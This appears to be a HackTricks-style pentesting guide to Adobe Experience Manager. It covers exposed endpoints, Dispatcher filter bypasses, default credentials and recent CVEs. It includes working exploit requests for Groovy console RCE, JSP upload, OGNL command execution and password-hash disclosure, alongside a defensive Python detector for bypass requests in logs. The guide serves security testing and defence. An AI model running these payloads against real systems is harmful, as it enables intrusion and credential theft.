# AEM (Adobe Experience Manager) Pentesting

{{#include ../../banners/hacktricks-training.md}}

Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) is an enterprise CMS that runs on top of Apache Sling/Felix (OSGi) and a Java Content Repository (JCR).

From an attacker's perspective, AEM instances very often expose dangerous development endpoints, weak Dispatcher rules, default credentials and a long tail of CVEs that are patched every quarter.

The checklist below focuses on externally reachable (unauthenticated) attack surface that keeps showing up in real engagements (2022-2026).
## 1. Fingerprinting

```bash
$ curl -s -I https://target | egrep -i "aem|sling|cq"
X-Content-Type-Options: nosniff
X-Dispatcher: hu1            # header added by AEM Dispatcher
X-Vary: Accept-Encoding
```

Other quick indicators:

* `/etc.clientlibs/` static path present (returns JS/CSS).
* `/libs/granite/core/content/login.html` login page with the "Adobe Experience Manager" banner.
* `</script>` comment at the bottom of HTML.
## 2. High-value unauthenticated endpoints

| Path | What you get | Notes |
|---|---|---|
| `/.json`, `/.1.json` | JCR nodes via DefaultGetServlet | Often blocked, but Dispatcher bypass (see below) works. |
| `/bin/querybuilder.json?path=/` | QueryBuilder API | Leak of page tree, internal paths, user names. |
| `/system/console/status-*`, `/system/console/bundles` | OSGi/Felix console | 403 by default; if exposed & creds found → bundle-upload RCE. |
| `/crx/packmgr/index.jsp` | Package Manager | Allows authenticated content packages → JSP payload upload. |
| `/etc/groovyconsole/**` | AEM Groovy Console | If exposed → arbitrary Groovy / Java execution. |
| `/libs/cq/AuditlogSearchServlet.json` | Audit logs | Information disclosure. |
| `/libs/cq/ui/content/dumplibs.html` | ClientLibs dump | XSS vector. |
| `/adminui/debug` | AEM Forms on JEE Struts dev-mode OGNL evaluator | On misconfigured Forms installs (CVE-2025-54253) this endpoint executes unauthenticated OGNL → RCE. |
### Dispatcher bypass tricks (still working in 2025/2026)

Most production sites sit behind the Dispatcher (reverse proxy). Filter rules are frequently bypassed by abusing encoded characters or allowed static extensions.

Classic semicolon + allowed extension:

```http
GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1
```

Encoded slash bypass (2025 KB ka-27832):

```http
GET /%2fbin%2fquerybuilder.json?path=/etc&1_property=jcr:primaryType HTTP/1.1
```

If the Dispatcher allows encoded slashes, this returns JSON even when `/bin` is supposedly denied.
## 3. Common misconfigurations (still alive in 2026)

- Anonymous POST servlet: `POST /.json` with `:operation=import` lets you plant new JCR nodes. Blocking `*.json` POST in the Dispatcher fixes it.
- World-readable user profiles: the default ACL grants `jcr:read` on `/home/users/**/profile/*` to everyone.
- Default credentials: `admin:admin`, `author:author`, `replication:replication`.
- WCMDebugFilter enabled: reflected XSS via `?debug=layout` (CVE-2016-7882, still found on legacy 6.4 installs).
- Groovy Console exposed: remote code execution by sending a Groovy script:
  ```bash
  curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json
  ```
- Dispatcher encoded-slash gap: `/bin/querybuilder.json` and `/etc/truststore.json` reachable with `%2f`/`%3B` even when blocked by path filters.
- AEM Forms Struts devMode left enabled: `/adminui/debug?expression=` evaluates OGNL without auth (CVE-2025-54253), leading to unauthenticated RCE; a paired XXE in Forms submission (CVE-2025-54254) allows file read.
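The Dispatcher bypasses above and the misconfigurations in this section come down to the same mistake: the filter decides on the raw URL text, while Sling decides on the decoded, `;`-stripped resource path. The following Python script is an added example for this page, not HackTricks code and not Adobe's Dispatcher. It models a constructed, weak, last-match-wins rule set next to a check made on the resolved resource, and runs both over constructed access-log lines (the OGNL `expression=` value is replaced by a `REDACTED` placeholder). The sensitive-path list is the endpoint table above; the decoding and slash-collapsing steps are a simplified assumption about Sling's resolution; `normalize`, `raw_url_verdict`, `resolved_verdict` and `detect` are hypothetical helper names.

```python
"""Defender-side model of the raw-URL vs. resolved-resource gap, plus a log
detector. Added example; rule set, path list and log lines are constructed."""
import re
from fnmatch import fnmatchcase
from urllib.parse import unquote

# Resource prefixes from the endpoint table above (prefix match on the
# resolved Sling resource). Example list, not a complete policy.
SENSITIVE_PREFIXES = (
    "/bin/querybuilder", "/bin/groovyconsole", "/system/console",
    "/crx/packmgr", "/etc/groovyconsole", "/etc/truststore",
    "/libs/cq/AuditlogSearchServlet", "/libs/cq/ui/content/dumplibs",
    "/libs/mcm/salesforce", "/adminui/debug",
)

# Constructed weak filter in Dispatcher style: rules are applied in order to
# the RAW path and the last match wins. The static-extension allows at the end
# override the /bin and /etc denies for any URL that merely ends in .css.
WEAK_RULES = [
    ("deny", "*"),
    ("allow", "/content/*"),
    ("allow", "*.json"),   # site front end needs component JSON
    ("deny", "/bin/*"),
    ("deny", "/system/*"),
    ("deny", "/crx/*"),
    ("deny", "/etc/*"),
    ("allow", "*.css"),    # placed last: this is the gap
    ("allow", "*.js"),
]

def raw_url_verdict(target: str) -> str:
    """Evaluate WEAK_RULES against the raw request path (before '?')."""
    raw_path = target.split("?", 1)[0]
    verdict = "deny"
    for rule_type, pattern in WEAK_RULES:
        if fnmatchcase(raw_path, pattern):
            verdict = rule_type
    return verdict

def normalize(target: str) -> dict:
    """Resolve a raw target into the parts Sling acts on (simplified model)."""
    path, _, query = target.partition("?")
    for _ in range(3):                    # undo %2f and double encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.split(";", 1)[0]          # drop ';...' path parameters
    path = re.sub(r"/{2,}", "/", path)    # '//bin' -> '/bin' (assumption)
    head, _, last = path.rpartition("/")
    pieces = last.split(".")              # resource.selector(s).extension
    return {"resource": f"{head}/{pieces[0]}", "selectors": pieces[1:-1],
            "extension": pieces[-1].lower() if len(pieces) > 1 else "",
            "query": query}

def resolved_verdict(method: str, target: str) -> str:
    """Decide on the resolved resource, not on the raw URL text."""
    n = normalize(target)
    if n["resource"].startswith(SENSITIVE_PREFIXES):
        return "deny"
    if n["resource"] == "/" and n["extension"] == "json":
        return "deny"                     # /.json, /.1.json root dumps
    if method == "POST" and n["extension"] in ("json", "jsp"):
        return "deny"                     # anonymous :operation=import
    return "allow"

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed combined-log lines; the OGNL expression is REDACTED on purpose.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Jan/2026:10:00:01 +0000] "GET /content/site/en.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [05/Jan/2026:10:00:02 +0000] "GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1" 200 8911 "-" "curl/8.4"',
    '203.0.113.7 - - [05/Jan/2026:10:00:03 +0000] "GET /%2fbin%2fquerybuilder.json?path=/etc&1_property=jcr:primaryType HTTP/1.1" 200 2210 "-" "curl/8.4"',
    '203.0.113.7 - - [05/Jan/2026:10:00:04 +0000] "POST /.json HTTP/1.1" 201 310 "-" "curl/8.4"',
    '203.0.113.7 - - [05/Jan/2026:10:00:05 +0000] "GET /adminui/debug?expression=REDACTED HTTP/1.1" 200 44 "-" "curl/8.4"',
    '198.51.100.9 - - [05/Jan/2026:10:00:06 +0000] "GET /etc.clientlibs/site/clientlibs/main.css HTTP/1.1" 200 73210 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [05/Jan/2026:10:00:07 +0000] "POST /content/evil.jsp;%0aa.css HTTP/1.1" 201 290 "-" "curl/8.4"',
]

def detect(log_lines) -> list:
    """One finding per request that reaches a denied resource; tagged as a
    bypass when the raw-URL filter would have let it through."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or resolved_verdict(m["method"], m["target"]) != "deny":
            continue
        findings.append({
            "ip": m["ip"], "method": m["method"], "status": int(m["status"]),
            "resource": normalize(m["target"])["resource"],
            "kind": "dispatcher-bypass" if raw_url_verdict(m["target"]) == "allow"
                    else "sensitive-endpoint",
        })
    return findings

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f['kind']:<18} {f['method']:<4} {f['resource']:<24} status={f['status']} ip={f['ip']}")
```

Run as-is it prints five findings; the four tagged `dispatcher-bypass` are exactly the requests the raw-URL rule set would have allowed (semicolon + `.css`, encoded slash, `POST /.json`, and the JSP node plant), while `/adminui/debug` is denied by both and is flagged only because it was reached at all. The takeaway for a Dispatcher review is the page's own fix plus the normalization step: block `*.json` POST, and compare against the decoded, `;`-stripped path rather than the raw URL string.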
## 4. Recent vulnerabilities (service-pack cadence)

| Quarter | CVE / Bulletin | Affected | Impact |
|---|---|---|---|
| Dec 2025 | APSB25-115, CVE-2025-64537/64539 | 6.5.24 & earlier, Cloud 2025.12 | Multiple critical/stored XSS → code execution via author UI. |
| Sep 2025 | APSB25-90 | 6.5.23 & earlier | Security feature bypass chain (Dispatcher auth checker) → upgrade to 6.5.24/Cloud 2025.12. |
| Aug 2025 | CVE-2025-54253 / 54254 (AEM Forms JEE) | Forms 6.5.23.0 and earlier | DevMode OGNL RCE + XXE file read, unauthenticated. |
| Jun 2025 | APSB25-48 | 6.5.23 & earlier | Stored XSS and privilege escalation in Communities components. |
| Dec 2024 | APSB24-69 (rev. Mar 2025 adds CVE-2024-53962…74) | 6.5.22 & earlier | DOM/Stored XSS, arbitrary code exec (low-priv). |
| Dec 2023 | APSB23-72 | ≤ 6.5.18 | DOM-based XSS via crafted URL. |

Always check the APSB bulletin matching the customer's service pack and push for the latest 6.5.24 (Nov 26, 2025) or Cloud Service 2025.12. AEM Forms on JEE requires its own add-on hotfix 6.5.0-0108+.
## 5. Exploitation snippets

### 5.1 RCE via dispatcher bypass + JSP upload

If anonymous write is possible:

```http
# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded

:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import
```

Now request `/content/evil.jsp`: the JSP runs with the AEM process user.

### 5.2 SSRF to RCE (historical < 6.3)

```http
/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console
```

`aem_ssrf2rce.py` from aem-hacker automates the full chain.

### 5.3 OGNL RCE on AEM Forms JEE (CVE-2025-54253)

```bash
# Unauth devMode OGNL to run whoami
curl -k "https://target:8443/adminui/debug?expression=%23cmd%3D%27whoami%27,%23p=new%20java.lang.ProcessBuilder(%23cmd).start(),%23out=new%20java.io.InputStreamReader(%23p.getInputStream()),%23br=new%20java.io.BufferedReader(%23out),%23br.readLine()"
```

If vulnerable, the HTTP body contains the command output.

### 5.4 QueryBuilder hash disclosure (encoded slash bypass)

```http
GET /%2fbin%2fquerybuilder.json?path=/home&type=rep:User&p.hits=full&p.nodedepth=2&p.offset=0 HTTP/1.1
```

Returns user nodes including `rep:password` hashes when anonymous read ACLs are default.
## 6. Tooling

- aem-hacker: Swiss-army enumeration script, supports dispatcher bypass, SSRF detection, default-creds checks and more.
  ```bash
  python3 aem_hacker.py -u https://target --host attacker-ip
  ```
- Tenable WAS plugin 115065: detects QueryBuilder hash disclosure & encoded-slash bypass automatically (published Dec 2025).
- Content brute-force: recursively request `/_jcr_content.(json|html)` to discover hidden components.
- osgi-infect: upload malicious OSGi bundle via `/system/console/bundles` if creds available.

## References

- Adobe Security Bulletin APSB25-115: Security updates for Adobe Experience Manager (Dec 9, 2025)
- BleepingComputer: Adobe issues emergency fixes for AEM Forms zero-days (Aug 5, 2025)

{{#include ../../banners/hacktricks-training.md}}